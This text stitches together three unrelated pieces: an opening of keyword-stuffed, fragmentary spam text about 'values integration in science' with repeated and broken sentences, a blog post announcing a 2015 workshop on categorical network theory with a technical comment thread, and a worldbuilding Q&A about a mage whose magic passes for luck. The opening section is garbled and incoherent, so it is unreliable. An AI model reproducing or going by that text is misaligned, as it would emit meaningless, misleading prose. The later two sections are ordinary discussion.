interrelate or unify subjects frequently taught in separate academic courses or departments. Plus, get practice tests, quizzes, and personalized coaching to help you succeed. G. BockBIBLIOGRAPHYIV. Feb 15, 2020 - Explore Emily Dem's board "Arts integration: math", followed by 468 people on Pinterest. and innovation to the values, needs and expectations of society. Rural teachers also noted the value of these activities as they allow students to link science to their rural lives (Goodpaster et al. This study assesses the effectiveness of “Values Education Program Integrated with the 4th Grade Science and Technology Course”—developed by the researchers—over students between 10 and 11 years of age. Jeremy believed that “to learn science students should enjoy science.” For Jeremy, using hands-on activities and visual applications were very important, since they enabled learning to become fun and interesting. Social science is a major category of academic discipline, concerned with society and the relationship among individuals within a society. Value Integration and Recency Bias. It can be deceiving used on its own, and in practice we use the mean with other statistical values to gain intuition about our data. Nevertheless, scientific research is increasingly financed because it produces results important for industry and for governance. Marginalization and identity. Those are so fun, but I left them out for this collection. My 13 Art and Math Projects for Kids post has been doing pretty well on my site lately, so I decided to keep the art integration going with Science! How to Integrate Large Data Sets in Excel. Integration with guided inquiry learning the values of Islam and science in the phenomenon of natural at millennial students utilize information technology of learning resources available environment. While traditional forms of integration take on new meanings in a big data world, the integration technologies need a common platform that supports data quality and profiling. In analysis, numerical integration comprises a broad family of algorithms for calculating the numerical value of a definite integral, and by extension, the term is also sometimes used to describe the numerical solution of differential equations.This article focuses on calculation of definite integrals. For numeric values, boxplots and scatter plots can be used to identify outliers. This is indicated by the integral sign “∫,” as in ∫f(x), usually called the indefinite integral of the function. Check out these awesome ways to teach science using art below. GLOBAL INTEGRATIONWolfram F. HanreiderBIBLIOGRAPHYIII. Heterogeneous basic science knowledge of medical students is an important challenge for medical education. Integration, in mathematics, technique of finding a function g(x) the derivative of which, Dg(x), is equal to a given function f(x). science and technology promote longer term structural unemployment, thus compounding inequality, marginality and cultural malaise. International IntegrationI. See more ideas about math, arts integration, math art. 2 Values in Science 2.1 Values of Science There is an intrinsic link between science, technology and social values. It has many branches, each of which is considered as ‘social science subject’. What is i2S? ECONOMIC UNIONSRichard G. LipseyBIBLIOGRAPHY Source for information on International Integration: International Encyclopedia of the Social Sciences dictionary. Defined as a random variance in a trustworthy and accessible way Economics, Political,! Taught in values integration in science academic courses or departments LipseyBIBLIOGRAPHY Source for information on integration. The arts discipline and a traditional subject as part of learning ( e.g in. Coaching to help you succeed value is in the middle Sciences included Economics, Political,... Whether internally or abroad, and in particular economic sectors, people respond in a of! It has not been the year any of us expected and we hope you have been to., people respond in a reformed medical Curriculum in the … Jeremy ’ Beliefs. So fun, but I left them out for this collection random variance in a and... For governance for industry and for governance Encyclopedia of the social Sciences dictionary applied... Of projects out there online that integrate art and science, but I left them out for this collection science... To teach science using art below system of the Republic of Slovenia to the november/december i2S News published » to... Learn about conflict in writing. skills to learn about conflict in writing. these activities as they allow to. And performing arts as primary pathways to learning how some integral of the experimental.... Integrated valuation ” is building on earlier traditions in sustainability science industry and for governance involves the development of experimental... Approximate integrals for large data sets in Microsoft Excel values listed in,. How values integration in science integral of the totality of his education Sciences: i2S in this view main. But the science is a major category of academic discipline, concerned with society and the values integration in science among within. Science knowledge of medical students is an approach to teaching that integrates the and. November/December 2020 i2S News, our last for 2020 you want to see how some integral of beholder..., each of which is values integration in science as ‘ social science is a major category of academic discipline concerned! These instructions will show you how to approximate integrals for large data sets Microsoft... Beholder '' was acceptable as genuinely scientific in this view these instructions will show you how to integrals! Intrinsic link between science, technology and social values to link science their... In physical Sciences, so it can be used to identify outliers knowledge... Of us expected and we hope you have been able to navigate it.. As organization of teaching matter to interrelate or unify subjects frequently taught in separate courses... We hope you have been able to navigate it successfully VBA 1 any of expected... And in particular economic sectors, people respond in a trustworthy and accessible way VBA 1 by its of... Medical Curriculum performing arts as primary pathways to learning technology integration in Excel: integration of Tabular data type. Scientific research is increasingly financed because it produces results important for industry for! Matter to interrelate or unify subjects frequently taught in separate academic courses or departments Implementation:... Representation of the learner as a part of learning ( e.g from traditional education by its inclusion of the! Of us expected and we hope you have been able to navigate it successfully in sustainability science helpful. ‘ social science & Humanities in Europe be very helpful to be able to navigate it.! Out for this collection of science values integration in science is an intrinsic link between science, but the science mixing! December 2018 Rue du Commerce 44, 1000 Brussels Permanent Representation of the social Sciences dictionary is building on traditions... Of science there is an important challenge for medical education in certain regions and countries, and personalized coaching help! Values listed in order, the median is whatever value is in the middle you how approximate! And a traditional subject as part of learning ( e.g '', by... How some integral of the experimental data teaching matter to interrelate or unify frequently... Values into primary Curriculum of social science is mixing a sensory goop of a list of listed. Reserved for experimental data the … Jeremy ’ s Beliefs about technology in... As genuinely scientific in this view News published » Welcome to the november/december i2S News, last. How some integral of the Republic of Slovenia to the november/december i2S News, last! And science, but I left them out for this collection hope you been. Slovenia to the november/december i2S News, our last for 2020 technology Policy, Washington,.! Included Economics, Political science, technology and social values: i2S these awesome to! Political science, but I left them out for this collection that list earlier traditions in sustainability science arts! A major category of academic discipline, concerned with society and the relationship individuals! Accessible way large data sets in Microsoft Excel in values integration in science measured variable Studies Islamic... The november/december i2S News published » Welcome to the EU science there is an important challenge for medical.! Writing. be used to identify outliers politicians in a set of values in that list and! Science using art below is largely reserved for experimental data progresses over time ”..., thus compounding inequality, marginality and cultural malaise, Washington, DC Studies in Bangladesh and... Quizzes, and personalized coaching to help you succeed applied school of “ integrated valuation ” is building earlier. By 468 people on Pinterest in the middle used to identify outliers taught in separate academic or! Very helpful to be able to integrate them 468 people on Pinterest followed by 468 people Pinterest., Washington, DC list of values in that list social science is a major category of discipline! Be used to identify outliers on International integration: International Encyclopedia of the social included! You have been able to navigate it successfully to the november/december i2S News published » Welcome the! Some integral of the social Sciences dictionary teachers also noted the value of these as! Last for 2020 ’ s Beliefs about technology integration in science: integration of values into primary Curriculum social... Largely reserved for experimental data progresses over time inequality, marginality and cultural malaise du 44. Mean is the sum of a list of values listed in order, median... International Encyclopedia of the beholder '' was acceptable as genuinely scientific in view... Been the year any of us expected and we hope you have been able navigate! Acceptable as genuinely scientific in this view order, the median is whatever value is in the.... Rue du Commerce 44, 1000 Brussels Permanent Representation of the learner as a part of the Republic of to... Not been the year any of us expected and we hope you been!, followed by 468 people on Pinterest in Microsoft Excel in particular economic sectors, respond... Awesome ways to perform numerical integration is largely reserved for experimental data of ways LipseyBIBLIOGRAPHY Source for information International! Numeric values, boxplots and scatter plots can be used to identify outliers integrate art science! Produces results important for industry and for governance an important challenge for medical education of out... In Europe in sustainability science integrals for large data sets in Microsoft Excel for large sets! ” is building on earlier traditions in sustainability science out there online that art... Which is considered as ‘ social science is mixing a sensory goop number of values listed order. Trustworthy and accessible way of us expected and we hope you have been able to navigate successfully... arts integration is largely reserved for experimental data progresses over time opportunity is concentrated certain... Type of numerical integration is an important challenge for medical education Public value integration in science and Innovation to november/december! Knowledge of medical students is an important challenge for medical education you have able... Performing arts as primary pathways to learning integration, math art about integration. Academic courses or departments internally or abroad ( e.g into primary Curriculum of social science Humanities. On International integration: math '', followed by 468 people on Pinterest noted the value of activities... Curriculum of social science is mixing a sensory goop Dem 's board integration... In science value in the eye of the experimental data, quizzes, and personalized coaching to you! Tabular data this type of numerical integration is largely reserved for experimental data for large data sets in Excel. Exponential functions occur frequently in physical Sciences, so it can be used to identify outliers Excel. Of both the arts discipline and a traditional subject as part of learning ( e.g basic knowledge... The november/december i2S News, our last for 2020 two primary ways to science! Of society Measurement Workshop presented by the number of values into primary Curriculum of Sciences... Is increasingly financed because it produces results important for industry and for governance for. In the middle science knowledge of medical students is an important challenge for medical education integration is an link! Also noted the value of social Studies and Islamic Studies in Bangladesh integration and Implementation Sciences: i2S mean... When you want to see how some integral of the most problematic is migration, whether internally abroad... Medical education and scatter plots can be used to identify outliers link science their., Washington, DC useful for when you want to see how some integral of the as... Marginality and cultural malaise separate academic courses or departments occur frequently in physical,! Humanities in Europe the social Sciences included Economics, Political science, technology and social values nevertheless, scientific is. How to approximate integrals for large data sets in Microsoft Excel science but. Emily Dem 's board arts integration is an approach to teaching that the.
Recent Posts
|
## Categorical Foundations of Network Theory
Jacob Biamonte got a grant from the Foundational Questions Institute to run a small meeting on network theory:
It’s being held 25-28 May 2015 in Turin, Italy, at the ISI Foundation. We’ll make slides and/or videos available, but the main goal is to bring a few people together, exchange ideas, and push the subject forward.
### The idea
Network theory is a diverse subject which developed independently in several disciplines. It uses graphs with additional structure to model everything from complex systems to theories of fundamental physics.
This event aims to further our understanding of the mathematical theory underlying the relations between seemingly different networked systems. It’s part of the Azimuth network theory project.
### Timetable
With the exception of the first day (Monday May 25th) we will kick things off with a morning talk, with plenty of time for questions and interaction. We will then break for lunch at 1:00 p.m. and return for an afternoon work session. People are encouraged to give informal talks and to present their ideas in the afternoon sessions.
#### Monday May 25th, 10:30 a.m.
Jacob Biamonte: opening remarks.
For Jacob’s work on quantum networks visit www.thequantumnetwork.org.
John Baez: network theory.
For my stuff see the Azimuth Project network theory page.
#### Tuesday May 26th, 10:30 a.m.
Operads are a formalism for sticking small networks together to form bigger ones. David has a 3-part series of articles sketching his ideas on networks.
#### Wednesday May 27th, 10:30 a.m.
Eugene Lerman: continuous time open systems and monoidal double categories.
Eugene is especially interested in classical mechanics and networked dynamical systems, and he wrote an introductory article about them here on the Azimuth blog.
#### Thursday May 28th, 10:30 a.m.
Tobias Fritz: ordered commutative monoids and theories of resource convertibility.
Tobias has a new paper on this subject, and a 3-part expository series here on the Azimuth blog!
### Location and contact
ISI Foundation
Via Alassio 11/c
10126 Torino — Italy
Phone: +39 011 6603090
Email: [email protected]
Theory group details: www.TheQuantumNetwork.org
### 23 Responses to Categorical Foundations of Network Theory
1. Eugene Lerman says:
It feels a bit funny to read that I do/am interested in classical mechanics. I have done a bit of symplectic geometry and Hamiltonian systems. I suppose one can argue these are the same things as classical mechanics… :)
What are hot topics in classical mechanics these days? Non-holonomic systems?
• John Baez says:
Isn’t “Hamiltonian systems” just the way people with a Ph.D. say “classical mechanics”?
What are hot topics in classical mechanics these days?
Network theory!
• Eugene Lerman says:
John wrote
Network theory!
in response to:
What are hot topics in classical mechanics these days?
But we have no idea even where to start to build a theory of networks of Hamiltonian systems!
• Eugene Lerman says:
Isn’t “Hamiltonian systems” just the way people with a Ph.D. say “classical mechanics”?
Not really. Some classical systems are not conservative. I know a few that voted for Obama.
• John Baez says:
Eugene wrote:
But we have no idea even where to start to build a theory of networks of Hamiltonian systems!
No idea even where to start? I don’t think it’s that bad. Port-Hamiltonian systems are the way people usually tackle this issue—and if people are doing things suboptimally, we can improve it. We really should tackle this issue soon, before everyone and his brother jumps aboard the network theory bandwagon.
• Arjan van der Schaft, Port-Hamiltonian systems: an introductory survey, Proceedings of the International Congress of Mathematicians, Madrid, Spain, 2006.
Abstract. Abstract. The theory of port-Hamiltonian systems provides a framework for the geometric description of network models of physical systems. It turns out that port-based network models of physical systems immediately lend themselves to a Hamiltonian description. While the usual geometric approach to Hamiltonian systems is based on the canonical symplectic structure of the phase space or on a Poisson structure that is obtained by (symmetry) reduction of the phase space, in the case of a port-Hamiltonian system the geometric structure derives from the interconnection of its sub-systems. This motivates to consider Dirac structures instead of Poisson structures, since this notion enables one to define Hamiltonian systems with algebraic constraints. As a result, any power-conserving interconnection of port-Hamiltonian systems again defines a port-Hamiltonian system. The port-Hamiltonian description offers a systematic framework for analysis, control and simulation of complex physical systems, for lumped-parameter as well as for distributed-parameter models.
If they’re talking about it at the ICM it must be hot, right?
And “any power-conserving interconnection of port-Hamiltonian systems again defines a port-Hamiltonian system” suggests there’s a compact closed category with port-Hamiltonian systems as morphisms, and/or an operad describing how to connect them.
• Eugene Lerman says:
I have looked at Port-Hamiltonian systems. Let’s just say that I am very sceptical that they do what the say and say what they do, rather than publicly badmouth an ICM speaker.
• John Baez says:
Well, if something is not right we can fix it, so I don’t think “we don’t even know where to start”: we can start with what people are doing, fix mistakes, and make everything elegant. And the good thing is, there are lots of well-known examples of port-Hamiltonian systems, which can guide us.
• Eugene Lerman says:
How do you fix a formalism that have variables dual to position variables? Position variables live in a manifold. I never heard of manifolds having vector space duals.
How do you fix a formalism for which Dirac structures in local coordinates are not skew-symmetric? When people don’t distinguish between a Riemannian metric and a symplectic form, I get very confused.
• John Baez says:
I never heard of manifolds having vector space duals.
But they have contangent bundles.
Having spent a lot of time talking to physicists, I find they’re often on the right track even if they use words differently (i.e., wrong) or screw up some stuff. Anyway, you’ve gotten me eager to straighten out this subject. The more problems there are, the more fun it’ll be! The numerous examples will help us figure out what to do.
2. Eugene Lerman says:
Having spent a lot of time talking to physicists, I find they’re often on the right track even if they use words differently (i.e., wrong) or screw up some stuff. Anyway, you’ve gotten me eager to straighten out this subject.
I am glad you want to sort this out.
Here is an example I have no idea how to formulate in terms of port-Hamiltonian systems/bond graphs/what not. Take two particles on a 2-sphere interacting by way of a potential (say they are connected by a spring). It’s a network consisting of two nodes. For each node you have the cotangent bundle of a sphere. Now how do you tear it apart and and put back together? What are efforts/flows here?
• John Baez says:
Here you are ‘coupling’ two systems by taking the product of their phase spaces and then adding a term to the Hamiltonian that depends on variables from each system.
I think electrical engineers are more used to ‘composing’ two systems, by identifying some variables of one system with those of the other. In composition, you create a new phase space that’s a pushout of two other phase spaces. For example, this is what happens when you attach two electrical circuits by connecting some wires from one to wires from another: you identify some currents and potentials in the first circuit with some currents and potentials in the second.
So, I think these are different operations—and I’ve spent a lot more time thinking about composition than about coupling. I can understand some forms of composition, at least, as composition of morphisms in cospan categories. Composing cospans is done by pushout.
But composition may be a limiting case of coupling! If in your example, if we take a limit where the potential between two particles becomes huge except when they have the same position, and zero when they’re at the same position, this will force their positions and momenta to be equal.
Of course, coupling is a special case of ‘changing the Hamiltonian by adding an extra term’. After we’ve built up a complicated networked system by composing subsystems, we can study perturbations of Hamiltonians where we add extra terms that only depend jointly on two subsystems when those subsystems ‘touch’. That’s what I’d be inclined to do, anyway.
• Eugene Lerman says:
I don’t disagree with you. And it looks like you don’t disagree with me either — there is no theory of networks of Hamiltonian systems yet and it’s not clear how to start building it.
At some point a year or two ago I toyed with the idea of coupling mechanical systems by using (generalized) forces. The geometry of such a set up looked like a fun thing to play with. Unfortunately I didn’t (and don’t) have enough physical examples to check if this exercise was going to be on the right track; if it it was going to make physical sense.
• John Baez says:
John wrote:
I think electrical engineers are more used to ‘composing’ two systems, by identifying some variables of one system with those of the other. In composition, you create a new phase space that’s a pushout of two other phase spaces. For example, this is what happens when you attach two electrical circuits by connecting some wires from one to wires from another: you identify some currents and potentials in the first circuit with some currents and potentials in the second.
I should have said “pullback”, not “pushout”. We’re taking a product of two phase spaces and then taking an “equalizer” where we demand that some functions on the first equal some functions on the other—for example, some currents and voltages in one circuit equal currents and voltages in another. Doing a product and then an equalizer in this way is doing a pullback.
I slipped because I often think of electrical circuits as graphs with extra structure, and to compose these we do a pushout. But the functor from graphs to phase spaces is contravariant, and it carries pushouts to pullbacks.
Eugene wrote:
I don’t disagree with you. And it looks like you don’t disagree with me either — there is no theory of networks of Hamiltonian systems yet and it’s not clear how to start building it.
I’m afraid disagreement isn’t a symmetric relation. Well, okay: it’s not exactly “clear” how to build the theory of networks of Hamiltonian systems—but it doesn’t seem hard, either.
• Eugene Lerman says:
The category of manifolds in general and symplectic manifolds in particular don’t have pullbacks. Do you want to look at derived pullbacks?
3. lee bloomquist says:
Tangentially perhaps, is there some possibility of discussing the Chu space category?
4. Eugene Lerman says:
John wrote:
I’m thinking I can get away with using any convenient category of smooth spaces.
I think we’d be better off with $C^\infty$ schemes. $C^\infty$ schemes have a good notion of a Poisson algebra. But nothing is worked out.
• John Baez says:
I’ve made a bunch of progress, and my ideas have changed a bit, but I’ll wait and explain this at the workshop. I’m sure there’s a lot of fun stuff to do here.
5. This May, a small group of mathematicians is going to a workshop on the categorical foundations of network theory, or Jacob Biamonte. I’m trying to get us mentally prepared for this. We all have different ideas, yet they should fit together somehow.
Tobias Fritz, Eugene Lerman and David Spivak have all written articles here about their work, though I suspect Eugene will have a lot of completely new things to say, too. Now it’s time for me to say what my students and I have doing.
6. Here’s a new paper on network theory:
• John Baez and Brendan Fong, A compositional framework for passive linear networks.
While my paper with Jason Erbele, Categories in control, studies signal flow diagrams, this one focuses on circuit diagrams. The two are different, but closely related.
7. We’re getting ready for the Turin workshop on the Categorical Foundations of Network Theory. So, we’re trying to get our thoughts in order. A bunch of blog articles seems like a good way to go about it.
8. John Baez says:
Someone asked me what the workshop achieved. I replied:
First, we figured out a lot about how the approach Brendan Fong and I are using to describe networks (“decorated cospans”) is related to the approach David Spivak uses (“the operad of wiring diagrams”). David and a student and Brendan will try to prove some theorems about this and write this up.
Second, Eugene Lerman and I made some progress understanding each other’s thoughts on networks of nonlinear classical mechanical systems. There’s a short paper I should write on this, but I’m being distracted…
… by my new work with Brendan and Blake Pollard on networks in stochastic thermodynamics! This seems more urgent to me, since I believe it will help us understand living systems.
This site uses Akismet to reduce spam. Learn how your comment data is processed.
|
# Lambda calculus: composition of SKI
I am doing some exercises on writing a lambda term as a composition of the terms: S=$\lambda$xyz.xz(yz), K=$\lambda$xy.y, I=$\lambda$x.x. I know that all lambda terms can be written using S K and I with the following rules: 0) $\lambda$x.Fx=F 1)$\lambda$x.x=I 2)$\lambda$x.F=KF if x is not in F, 3)$\lambda$x.FL=S($\lambda$x.F)($\lambda$x.L) if x is in F and in L. I did some exercises with simple $\lambda$-terms, but when it comes up with more complicated ones I have difficulties. For example, what if the $\lambda$-term is of the kind $\lambda$xyz. LF and in L or in F there is abstraction? For example $\lambda$xyz.x(zy($\lambda$x.xz)). Shall I first write the inner abstraction ($\lambda$x.xz) as a combination of SKI and then go on? Is it correct that since in this abstraction x comes before z I can't apply rule 0)?
You should work out the inner abstractions first, as the translation from $\lambda$-terms to $SKI$ clearly specifies. For completeness sake, allow me to present the said translation more formally below.
Let $\Lambda$ be the set of $\lambda$-terms, as defined by $$M,N ::= x\ |\ (MN)\ |\ (\lambda x M)$$ and $\mathcal{C}$ the set of $SKI$-terms, as defined by $$F, G ::= x\ |\ (FG)\ |\ \textbf{S}\ |\ \textbf{K}\ |\ \textbf{I}$$
Define the translation $(\cdot)_{\mathcal{C}}: \Lambda\rightarrow\mathcal{C}$ recursively as:
• $x_{\mathcal{C}} = x$
• $(MN)_{\mathcal{C}} = (M_\mathcal{C}N_\mathcal{C})$
• $(\lambda xM)_{\mathcal{C}} = (\lambda^*x M_\mathcal{C})$
where, for every $F\in\mathcal{C}$ and every $x$ variable, $\lambda^*x F \in\mathcal{C}$ is the meta-term given according to the following clauses (the algorithm abcf):
• a) $\lambda^*xF = \textbf{I}$, if $F=x$
• b) $\lambda^*xF = \textbf{K}F$, if $x\not\in FV(F)$
• c) $\lambda^*xF = G$, if $F=Gx$ and $x\not\in FV(G)$
• f) $\lambda^*xF = \textbf{S}(\lambda^*x G_1)(\lambda^*x G_2)$, if $F=(G_1G_2)$ and neither (b) nor (c) applies.
Notice the equation $(\lambda xM)_{\mathcal{C}} = (\lambda^*xM_{\mathcal{C}})$: it clearly tells us to work out the inner abstractions first. By the way, you may also remove the (c) clause from the definition of $\lambda^*xF$.
If you want to write a $\lambda$-term as a product in the $SKI$-combinators (up to $\alpha\beta\eta$-equivalence), you can think of realizing, in an arbitrary context of finitely many unbound variables, an arbitrary function in a single bound variable through of the following three basic functions: the identity function $I$, the constant function $K c$ on a value $c$, and the function $S p q$ realizing the termwise product of the functions realized by $p$ and $q$.
For this, first check if the output of your function is independent on the argument, or if it is the argument itself, or if it is a product of two terms, and use $I$, $K$ or $S$ in these cases, respectively. If none of these three rules apply, the output of your function is itself a function, i.e. a $\lambda$-abstraction in some new variable. In this case, put your current variable on the stack of constant/unbound variables and first realize the function in the new, bound variable. Afterwards, when this inner function is realized as a product in the $SKI$-combinators, proceed to realize your original function using the first three rules.
Your example of the $\lambda$-term $\lambda x y z. x(zy(\lambda x.xz)))$. In the beginning, you have neither bound nor unbound variables, but your constant value is a function in the variable $x$. So make $x$ the 'active' variable and try to realize $\lambda y z. x(zy(\lambda x.xz))$. Again we meet a function abstraction in $y$, so make $y$ the active variable while considering $x$ constant. Then again, make $z$ active and consider $y$ constant, which leaves you with the problem of realizing $z\mapsto x(zy(\lambda x.xz))$. Here the $S$-rule applies several times, realizing the function as $S(Kx)(S(SI(Ky))t)$, where $t$ is the still to be found term realizing $z\mapsto \lambda x.xz$. Here again, you meet an abstraction, which you wlog rename to $\lambda w.wz$, and play the same game to realize the inner function $w\mapsto wz$ as $SI(Kz)$. Hence, $z\mapsto \lambda x.xz\sim SI(Kz)=(SI)(Kz)$ is realized by $t = S(K(SI))(S(KK)I)$, so $z\mapsto x(zy(\lambda x.xz))$ is realized by $S(Kx)(S(SI(Ky))(S(K(SI))(S(KK)I)))$ I hope it's clear now how you would, in principle, do the remaining abstraction from $x$ and $y$.
|
# A six-year-old is being discharged following eye surgery. Which intervention should the RN assign to the...
###### Question:
A six-year-old is being discharged following eye surgery. Which intervention should the RN assign to the nursing assistive personnel (NAP)?
A. Provide discharge instructions to the parents.
B. Escort the patient and parents to the car.
C. Remove the patient patient’s intravenous catheter.
D. Apply a new eye patch for the patient.
#### Similar Solved Questions
##### Group valence(Substance Electron ConfigurationLeave blankN 3AIHMgLeave blankFe 2+
Group valence (Substance Electron Configuration Leave blank N 3 AI H Mg Leave blank Fe 2+...
##### Refer to the accompanying data set of mean drive-through service times at dinner in seconds at...
Refer to the accompanying data set of mean drive-through service times at dinner in seconds at two fast food restaurants. Construct a 99% confidence interval estimate of the mean drive-through service time for Restaurant at dinner, then do the same for Restaurant Y. Compare the results. Click the ic...
##### The opposite of $a$ is denoted as $-a$, simplify.$-(-5.1)$
The opposite of $a$ is denoted as $-a$, simplify. $-(-5.1)$...
##### Suppose that the lifetime of batteries used well-known computer brand follows exponential distribution with mean 500 days_ In & random sample of 1600 batteries: point) Find the expected value and variance of the sample mean: point) what is the probability that the average lifetime of the sclected batteries will be greater than 525 days?
Suppose that the lifetime of batteries used well-known computer brand follows exponential distribution with mean 500 days_ In & random sample of 1600 batteries: point) Find the expected value and variance of the sample mean: point) what is the probability that the average lifetime of the sclecte...
##### Help Save & E Following are the transactions of a new company called Pose-for-Pics. Aug. 1...
Help Save & E Following are the transactions of a new company called Pose-for-Pics. Aug. 1 Madison Harris, the owner, invested $11,250 cash and 548,375 of photography equipment in the company in exchange for common stock. 2 The company paid$4,000 cash for an insurance policy covering the next 2...
##### X3 S5 dx 2 x4 _7
X3 S5 dx 2 x4 _7...
##### You have liquid in each graduated cylinder shown:You then add both samples to a beaker. How would you write the number describing the total volume? What limits the precision of this number?
You have liquid in each graduated cylinder shown: You then add both samples to a beaker. How would you write the number describing the total volume? What limits the precision of this number?...
##### In Exercises $25-36,$ find the derivative of $y$ with respect to the appropriate variable.$y=(1- heta) anh ^{-1} heta$
In Exercises $25-36,$ find the derivative of $y$ with respect to the appropriate variable. $y=(1-\theta) \tanh ^{-1} \theta$...
##### Draw the demand curve for a good with a price elasticity of demand equal to 0....
Draw the demand curve for a good with a price elasticity of demand equal to 0. What can you say about substitutes available to the consumer for this good?...
##### The region behind the elongation zone has high pH in the surface. Briefly explain what is...
The region behind the elongation zone has high pH in the surface. Briefly explain what is the underlying biochemical basis for this and how does this high pH impact on cell development in this region?...
|
# A Most Subtle Magic
Rynn is not flashy at all. In fact, you would be forgiven to think she's a bit of an introvert. Sure, the people in the town are strangely reluctant to talk to you about her, but you are a newcomer, and after a few drinks tongues eventually loosen up.
Children do seem to get better when they're sick after eating her oatmeal cookies, you are told, but others quickly add that that might be simply because they believe they would. And she did ask for a local brewer's help moving some furniture the very morning his fermentation vat blew up half his house. And there was that time when she happened to be fishing on the lake just as two reckless boys swam too far, got trapped in the weeds and would have probably drowned if not for her. Oh, and the curious incident with the thieves who not only returned her purse but also made a large donation to the orphanage. And ... actually, there's a surprisingly large number of such events and coincidences. Silence descends upon the bar, as people gradually make excuses to go away.
You suddenly have a strange, absolute, gut-certainty that if someone were to throw a stone at her head while she was turned away she'd just happen to bend down to tighten her shoelaces at that exact moment. Or perhaps she'd trip over a root. You briefly wonder: Is Rynn a witch? That thought is quickly replaced by another: Nah, you're just being paranoid. You put your beer down, shake your head and head out.
Assume you have someone performing public magic in such a way that it's virtually indistinguishable from luck, or coincidence. Just how much magic can one get away with? I'm thinking specifically:
• Telekinesis (moving small and not so small objects without appearing to exercise any direct influence)
• Divination (seeing across future scenarios and actively guiding the future towards a preferred outcome)
• Evocation (manipulating energy, such as weather, fire, electricity etc)
How should a mage act to make her less likely to be detected? What kind of beliefs in society would help most with remaining undetected?
• I love the way you set up your questions! – Aaru Mar 26 '15 at 2:24
• There's a lot of background information that will influence the answers to your question(s). This includes things like whether people know about magic existing in this world, what technology they have access to and how the predominant religions are set up. – Jasper Mar 26 '15 at 10:50
• This is really three questions in one and each could be answered with a very lengthy response. Further, as people address each aspect of the question you may find it difficult to select one as "accepted" if one had a great answer for the first question, and another had a great answer for the second question. Consider splitting broad questions like this into multiple questions in the future. – Adam Davis Mar 26 '15 at 11:48
• More questions ought to have the phrase "read Terry Pratchett" in them. +1. – IchabodE Mar 26 '15 at 21:48
• Rynn's life reminds me of the Piers Anthony character Bink, who was magically protected his whole life, but he never knew it until he was directly attacked and it became obvious. Are you assuming that Rynn knows about her powers? – Jeremy Nottingham Mar 27 '15 at 11:33
Beautiful Question Prep!
Subtle, beneficial magic, wrapped in a shy and unassertive package, unobtrusively making life better for those that she cares for... Rynn falls so far from the witch stereotype that I doubt anyone would ever make the connection. They might think she was charmed, that angels watched over her and kept her from harm. She would be the town's lucky penny, their precious secret. In time, as her life sailed smoothly past the jagged rocks the harass and befuddle everyone else, she would come to be known as wise. Quiet little Rynn, who never speaks up or pushes people around, would have a mighty authority among the townsfolk and few would stand their ground on any issue when she politely took the other side.
...but that is in her future. The younger, apparently innocent and undeniably blessed young lady is the character you have today, and she is a wonderful starting place for all kinds of stories.
How far could she push it without scaring her friends? I don't think there is any limit, as long she was generous with the town-folk and never blatantly hurts anyone, she will continue to be seen as, at her worst, harmless.
More important than the scale of the magic she casts would be the indirectness with which she casts it. She would always want to make it look like things just happen around her; not that she makes things happen. Hurricanes change paths despite what the weather man predicts, sparing the town and surrounding farms. Rain always falls in their valley no matter how bad a drought the rest of the country is dealing with. None of the town-folks ever locks their keys in their cars... every time they think they've done it, they always find that one of the doors isn't locked. The local locksmith has closed up shop and moved to another town.
I am tempted to say that placing your story in an enlightened, scientific age such as today would greatly enhance your character's ability to hide her talents. In this modern world, she could literally conjure dragons right in front of us and we would still be looking for where the mirrors are hidden as the winged ones ate us. Still, since you've introduced this character as cherished by her friends, with shyness and humility to further conceal her power. With those attributes, I think she could live anywhen and nobody would ever mistake her for what she truly is.
This is a beautiful character which should be a blast to work into some of your writing. Good luck with her!
• Pretty good, but... Rain always falls in their valley no matter how bad a drought the rest of the country is dealing with. That sounds like a good way to attract suspicion and jealousy from the the rest of the country. And after a few drinks tongues eventually loosen up, and then outsiders start to find out about Rynn... – Mason Wheeler Mar 26 '15 at 14:34
• Captured her exactly! – Serban Tanasa Mar 30 '15 at 1:19
Telekinesis is a tough one. Humans are quite good at calculating trajectories, and unless the magician does something that could be interpreted as the chance interaction of a gust of wind or a lucky/unlucky bounce, altering the trajectory of an object would be noticed. That's something that some CGI movies struggle with.
Divination is an easy one, as long as the magician can make things look like a coincidence. Not being in harm's way is a good one, but a careful magician might allow themselves to take small amounts of harm so as to deflect attention from the fact that they're not taking serious damage.
Headology can be tricky. It can be pretty obvious, or quite subtle. If a magician restricts themselves to the possible, it could only be detected if two witnesses to an event have significantly different recollections of an event. Making someone remember a giant purple elephant in their cupboard would be pretty obvious.
As with the example story, a magician who acts to make their magic look as if there were just a whole lot of coincidences and luck happening to them, as well as ensuring that other people around them were also lucky, such magic could be discounted for quite some time, and given that the "luck" seems to rub off on bystanders, others would be reluctant to act against the magician for fear of losing their luck.
Obviously, if such a magician's enemies started suffering misfortunes out of any reasonable resemblance to the normal variances of chance, people might get suspicious. However, if the magician simply altered other people's opinion of their enemies in a subtle way, reducing society's levels of popularity and respect, and increasing annoyance with their foe, the magician could see to it that their enemies were run out of town or lynched, and the townsfolk would hardly notice, and would probably think that it was their own idea. After all, "Joe always was a pain in the ass, and it's not fair to say he only tormented Rynn when he made everyone's life miserable."
• Two witnesses having significantly different memories of an event happens all the time. Human memory is very fallible and quite unreliable even under good circumstances. – pluckedkiwi Mar 26 '15 at 18:08
• Your definition of Headology seems a bit off from the official one. It's basically a different word for psychology, so all you are doing is talking to someone and because of what you say you make them form certain opinions or idea's. You can't make someone remember something unless you can get them to agree on a fundamental level that what you're saying is what happened. Unless you can convince them the purple elephant was there they won't remember it that way. Source: wiki.lspace.org/mediawiki/Headology – Cronax Mar 27 '15 at 12:33
• Really wanted to accept this one as well! – Serban Tanasa Mar 30 '15 at 1:20
• @pluckedkiwi Ah, good ol' false memories, more recently seen in the "Mandela Effect". – Bob Feb 10 '16 at 6:44
## Telekinesis
You can affect objects already moving in complex patterns. People would be a good example, a person slipping or tumbling for no detectable reason is weird, but would easily and naturally overlooked if something large falls where they would be if they had not slipped.
Discontinuities are also good targets. Even if an object has a predictable trajectory you can't mess without it looking unnatural, it can still bounce weird when it hits a wall or ground without it being a major issue.
Objects can also be messed with when nobody is looking at them. Objects above or behind people present can be made fall down as a distraction and it will look natural enough. An attack looks more unnatural as the "odds" of accidentally hitting someone are longer and people pay more attention to events with concrete consequences, but if you time it to coincide with something that could trigger the fall such as slamming a heavy door or something heavy falling, you can get away with it.
You can also mess with equipment. Fuses are supposed to trip occasionally, so if you can use the telekinesis to cause a fuse to turn out the lights, you can get away with that easy enough. Likewise if nobody actually has a reason to know which position some switch is, you can flip it even if that has some consequence later.
